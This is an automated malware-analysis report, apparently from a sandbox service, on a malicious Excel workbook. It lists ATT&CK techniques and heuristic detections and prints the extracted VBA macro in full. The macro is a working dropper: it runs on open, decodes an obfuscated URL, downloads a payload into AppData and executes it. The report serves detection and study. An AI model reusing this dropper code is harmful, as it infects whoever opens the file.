MALICIOUS
216
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample is an Excel file containing a Workbook_Open VBA macro that is designed to execute automatically when the workbook is opened. This macro uses the URLDownloadToFile API to download a second-stage payload from the hardcoded URL "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui" to a file named "fyf/ttbb" within the user's AppData directory. Subsequently, it uses ShellExecuteA to execute the downloaded file. The document body prompts the user to enable content, which is a common lure for macro-based malware.
Heuristics 7
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _ ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb") bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9618 bytes |
SHA-256: abdb40e88e155f6c162ac77a05a2a7f3897e88820fed26a88ebdb24d3ccc907e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Dil()
End Sub
Attribute VB_Name = "UJFkrkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function etTime Lib "winmm.dll" () As Long
Private Declare Function timeGetTime Lib "winmm.dll" () As Long
Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long
Private Declare PtrSafe Function Hwclmk Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal mYLnJHkRjU As Long, ByVal YyYkewtQmKCzKcqLzIhcEG As String, _
ByVal nHMUKqzz As String, ByVal yDZhoSgfvyB As String, ByVal tRhZJsuOrwJGpCccD As String, ByVal LXAT As Long) As Long
Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _
ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long
Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long
Sub qxEU()
Dim pAuMwLKkfkFDfgxSGfgD As String
Dim SCNTPJYGHDMjhgYgHDJhjF As String
Dim bsGOPZxsVWDKdlbGBCAFInmhun As String
Dim wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd As String
Dim HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD As String
Dim pQkPoFRGDxPMjSekgrIJ As String
SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb")
bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF
pAuMwLKkfkFDfgxSGfgD = Decrypt("fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui")
nYNiXOdnVVIvWsFTBSE 0, pAuMwLKkfkFDfgxSGfgD, bsGOPZxsVWDKdlbGBCAFInmhun, 0, 0
Hwclmk 0, "open", bsGOPZxsVWDKdlbGBCAFInmhun, "", vbNullString, vbNormalFocus
End Sub
Sub Workbook_Open()
qxEU
End Sub
Function DisHp4e1dEwtDO8XRgW() As Currency
Call t7IOznwCrl
End Function
Static Function t7IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VR
End Function
Static Function Jb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkq
End Function
Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7x
End Function
Static Function JxU0xFkI7x() As Date
Call rzGwrPUM9xS2rvCsRX6OdVek
End Function
Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call hx2errEArb
End Function
Static Function hx2errEArb() As Double
Call lkYXBK4r3WCbBQoVfs4z78R
End Function
Function lkYXBK4r3WCbBQoVfs4z78R() As Single
Call FZ4yZPaWVH
End Function
Function Decrypt(enci)
Dim bbop As String
Dim cost As Date
Dim vcninDkMDYSfv
Dim AppData
Dim ikolpliktrUjmM
Dim np As Byte
enci = StrReverse(enci)
For ikolpliktrUjmM = 1 To Len(enci)
vcninDkMDYSfv = Mid(enci, ikolpliktrUjmM, 1)
bbop = ""
cost = 19 / 6 / 2190
nn = 1
AppData = AppData & Chr(AscW(vcninDkMDYSfv) - 1)
Next
Decrypt = AppData
For np = 1 To Len(enc)
Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_5g3uxr3m
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 911 bytes
' Line #0:
' FuncDefn (Sub Sheet3())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/UJFkrkbook - 9200 bytes
' Line #0:
' FuncDefn (Private Declare Function Workbook Lib "Hwclmk" () As Long)
' Line #1:
' Line #2:
' Line #3:
' FuncDefn (Private Declare Function mYLnJHkRjU Lib "Hwclmk" () As Long)
' Line #4:
' Line #5:
' FuncDefn (Private Declare PtrSafe Function YyYkewtQmKCzKcqLzIhcEG Lib "Hwclmk" () As Long)
' Line #6:
' Line #7:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function yDZhoSgfvyB Lib "oEWrK" (ByVal tRhZJsuOrwJGpCccD As Long, ByVal LXAT As String, ByVal shell32.dll As String, ByVal nYNiXOdnVVIvWsFTBSE As String, ByVal IiWTNgdAVuAwHLZv As String, ByVal xGQK As Long) As Long)
' Line #8:
' Line #9:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function EuZjjimXQXCOOeildBQJt Lib "SCNTPJYGHDMjhgYgHDJhjF" (ByVal beybftDY As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal qxEU As Long, ByVal pAuMwLKkfkFDfgxSGfgD As Long) As Long)
' Line #10:
' Line #11:
' FuncDefn (Private Declare PtrSafe Function bsGOPZxsVWDKdlbGBCAFInmhun Lib "Hwclmk" () As Long)
' Line #12:
' Line #13:
' Line #14:
' FuncDefn (Sub wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd())
' Line #15:
' Dim
' VarDefn HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD (As String)
' Line #16:
' Dim
' VarDefn pQkPoFRGDxPMjSekgrIJ (As String)
' Line #17:
' Dim
' VarDefn Decrypt (As String)
' Line #18:
' Dim
' VarDefn Environ (As String)
' Line #19:
' Dim
' VarDefn vbNullString (As String)
' Line #20:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #21:
' LitStr 0x0008 "fyf/ttbb"
' ArgsLd Workbook_Open 0x0001
' St pQkPoFRGDxPMjSekgrIJ
' Line #22:
' LitStr 0x0007 "AppData"
' ArgsLd DisHp4e1dEwtDO8XRgW$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld pQkPoFRGDxPMjSekgrIJ
' Concat
' St Decrypt
' Line #23:
' Line #24:
' Line #25:
' LitStr 0x0030 "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui"
' ArgsLd Workbook_Open 0x0001
' St HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD
' Line #26:
' Line #27:
' LitDI2 0x0000
' Ld HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall EuZjjimXQXCOOeildBQJt 0x0005
' Line #28:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld t7IOznwCrl
' Ld Dp62rz6kt90kDRkudpcs1fW4
' ArgsCall yDZhoSgfvyB 0x0006
' Line #29:
' EndSub
' Line #30:
' Line #31:
' FuncDefn (Sub Jb8AvPk2VR())
' Line #32:
' Line #33:
' ArgsCall wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd 0x0000
' Line #34:
' EndSub
' Line #35:
' Line #36:
' Line #37:
' FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #38:
' ArgsCall (Call) JxU0xFkI7x 0x0000
' Line #39:
' EndFunc
' Line #40:
' FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #41:
' ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000
' Line #42:
' EndFunc
' Line #43:
' FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #44:
' ArgsCall (Call) hx2errEArb 0x0000
' Line #45:
' EndFunc
' Line #46:
' FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #47:
' ArgsCall (Call) lkYXBK4r3WCbBQoVfs4z78R 0x0000
' Line #48:
' EndFunc
' Line #49:
' FuncDefn (Function lkYXBK4r3WCbBQoVfs4z78R(id_FFFE As Variant) As Variant)
' Line #50:
' ArgsCall (Call) FZ4yZPaWVH 0x0000
' Line #51:
' EndFunc
' Line #52:
' FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #53:
' ArgsCall (Call) DecryptON 0x0000
' Line #54:
' EndFunc
' Line #55:
' FuncDefn (Function DecryptON(id_FFFE As Variant) As Variant)
' Line #56:
' ArgsCall (Call) enci 0x0000
' Line #57:
' EndFunc
' Line #58:
' FuncDefn (Static Function enci(id_FFFE As Double) As Double)
' Line #59:
' ArgsCall (Call) bbop 0x0000
' Line #60:
' EndFunc
' Line #61:
' FuncDefn (Function bbop(id_FFFE As Single) As Single)
' Line #62:
' ArgsCall (Call) cost 0x0000
' Line #63:
' EndFunc
' Line #64:
' Line #65:
' FuncDefn (Function Workbook_Open(AppData, id_FFFE As Variant))
' Line #66:
' Dim
' VarDefn ikolpliktrUjmM (As String)
' Line #67:
' Dim
' VarDefn np (As Date)
' Line #68:
' Dim
' VarDefn StrReverse
' Line #69:
' Dim
' VarDefn nn
' Line #70:
' Dim
' VarDefn Chr
' Line #71:
' Dim
' VarDefn AscW (As Byte)
' Line #72:
' Ld AppData
' ArgsLd enc 0x0001
' St AppData
' Line #73:
' StartForVariable
' Ld Chr
' EndForVariable
' LitDI2 0x0001
' Ld AppData
' FnLen
' For
' Line #74:
' Ld AppData
' Ld Chr
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St StrReverse
' Line #75:
' Line #76:
' LitStr 0x0000 ""
' St ikolpliktrUjmM
' Line #77:
' LitDI2 0x0013
' LitDI2 0x0006
' Div
' LitDI2 0x088E
' Div
' St np
' Line #78:
' LitDI2 0x0001
' St _B_str_Environ
' Line #79:
' Ld nn
' Ld StrReverse
' ArgsLd _B_var_nn 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd _B_var_Mid 0x0001
' Concat
' St nn
' Line #80:
' StartForVariable
' Next
' Line #81:
' Line #82:
' Ld nn
' St Workbook_Open
' Line #83:
' Line #84:
' StartForVariable
' Ld AscW
' EndForVariable
' LitDI2 0x0001
' Ld _B_var_Chr
' FnLen
' For
' Line #85:
' Line #86:
' StartForVariable
' Next
' Line #87:
' Line #88:
' EndFunc
' Line #89:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.